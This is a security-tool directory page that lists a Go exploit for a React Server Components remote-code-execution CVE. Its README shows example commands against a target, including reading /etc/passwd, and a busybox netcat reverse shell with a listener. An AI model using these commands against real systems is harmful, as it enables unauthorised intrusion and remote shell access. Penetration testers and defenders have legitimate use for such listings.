Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182-in-go — Go-based exploit for CVE-2025-55182, achieving remote code execution in React Server Components via prototype pollution. Supports arbitrary command execution and reverse shell payloads. | Kitploit
Tools/GitHubGitHub/w3nch/cve-2025-55182-in-go
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubw3nch/cve-2025-55182-in-go

CVE-2025-55182-in-go

Go-based exploit for CVE-2025-55182, achieving remote code execution in React Server Components via prototype pollution. Supports arbitrary command execution and reverse shell payloads.

View Repository
44 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 — React Server Components RCE

Exploit for RCE in React Server Components via prototype pollution.

Usage

go run main.go -t <target> -c <command>

Examples

go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"

Reverse shell

Setup revershell

penelope -i 0.0.0.0 -p 1337

Use busybox:

go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"

Build

go build -o exploit .

Notes

  • HTTPS is auto-added if scheme is missing
  • Command output is base64 encoded in the response
  • Redirects are intentionally disabled
Download Tool